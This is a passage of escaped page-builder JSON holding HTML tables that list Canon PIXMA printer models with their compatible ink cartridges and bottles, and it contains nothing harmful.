align=\\\"center\\\">PIXMA E560<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA E560 \\/ E560R<\\/td>\\n<td>CL-99 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-89 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G1010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G2010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3000<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G3010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA G4010<\\/td>\\n<td>GI-790 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>GI-790 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP100<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"2\\\" align=\\\"center\\\">PIXMA iP110 (with battery)<\\/td>\\n<td>CLI-36 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-35 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA iP1300<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA iP2770 \\/ iP2772<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA iP2870S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA iP4200<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA iP7270<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"12\\\" align=\\\"center\\\">PIXMA iP8770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Gray)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6770<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"11\\\" align=\\\"center\\\">PIXMA iX6870<\\/td>\\n<td>CLI-751 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-751XL (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-750XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-755XXL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2570S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MG2577S<\\/td>\\n<td>CL-746 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746S (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-746XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745S (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-745XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\"><tbody><tr align=\\\"center\\\"><td width=\\\"170\\\"><strong>Model<\\/strong><\\/td><td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3570<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MG3670<\\/td><td>CL-741 (Colour)<\\/td><\\/tr><tr><td>CL-741XL (Colour)<\\/td><\\/tr><tr><td>PG-740 (Pigment Black)<\\/td><\\/tr><tr><td>PG-740\\/CL-741 Value Pack<\\/td><\\/tr><tr><td>PG-740XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"10\\\" align=\\\"center\\\">PIXMA MG7570<\\/td><td>CLI-751 (Black)<\\/td><\\/tr><tr><td>CLI-751 (Cyan)<\\/td><\\/tr><tr><td>CLI-751 (Gray)<\\/td><\\/tr><tr><td>CLI-751 (Magenta)<\\/td><\\/tr><tr><td>CLI-751 (Yellow)<\\/td><\\/tr><tr><td>CLI-751XL (Black)<\\/td><\\/tr><tr><td>CLI-751XL (Cyan)<\\/td><\\/tr><tr><td>CLI-751XL (Gray)<\\/td><\\/tr><tr><td>CLI-751XL (Magenta)<\\/td><\\/tr><tr><td>CLI-751XL (Yellow)<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP160<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP170<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP180<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP228<\\/td><td>CL-41 (Colour)<\\/td><\\/tr><tr><td>CL-831 (Colour)<\\/td><\\/tr><tr><td>PG-40 (Pigment Black)<\\/td><\\/tr><tr><td>PG-40\\/CL-41 Value Pack<\\/td><\\/tr><tr><td>PG-830 (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP237<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP245<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP258<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><tr><td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP276<\\/td><td>CL-811 (Colour)<\\/td><\\/tr><tr><td>CL-811XL (Colour)<\\/td><\\/tr><tr><td>PG-810 (Pigment Black)<\\/td><\\/tr><tr><td>PG-810 Twin Pack<\\/td><\\/tr><tr><td>PG-810\\/CL-811 Value Pack<\\/td><\\/tr><tr><td>PG-810XL (Pigment Black)<\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table border=\\\"1\\\" width=\\\"378\\\" cellpadding=\\\"10\\\">\\n<tbody>\\n<tr align=\\\"center\\\">\\n<td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n<td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP287<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA MP460<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP476<\\/td>\\n<td>CL-41 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-831 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-40\\/CL-41 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-830 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP486<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP496<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP497<\\/td>\\n<td>CL-811 (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CL-811XL (Colour)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810 Twin Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810\\/CL-811 Value Pack<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PG-810XL (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP500<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"4\\\" align=\\\"center\\\">PIXMA MP520<\\/td>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP530<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP568<\\/td>\\n<td>CLI-821 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-821 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-820 (Pigment Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP600<\\/td>\\n<td>CLI-8 (Black)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Cyan)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Magenta)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>CLI-8 (Yellow)<\\/td>\\n<\\/tr>\\n<tr>\\n<td>PGI-5 (Pigment Black)<\\/td>\\n<\\/tr>\\n<\\/tbody>\\n<\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n    <tr align=\\\"center\\\">\\n      <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n      <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP610<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP628<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP638<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP648<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP800R<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP810<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"5\\\" align=\\\"center\\\">PIXMA MP830<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"7\\\" align=\\\"center\\\">PIXMA MP970<\\/td>\\n      <td>CLI-8 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Photo Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-8 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-5 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP988<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td rowspan=\\\"6\\\" align=\\\"center\\\">PIXMA MP996<\\/td>\\n      <td>CLI-821 (Black)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Cyan)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Gray)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Magenta)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>CLI-821 (Yellow)<\\/td>\\n    <\\/tr>\\n    <tr>\\n      <td>PGI-820 (Pigment Black)<\\/td>\\n    <\\/tr>\\n  <\\/tbody>\\n<\\/table>\\n\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\" border=\\\"1\\\" cellpadding=\\\"10\\\">\\n  <tbody>\\n  <tr 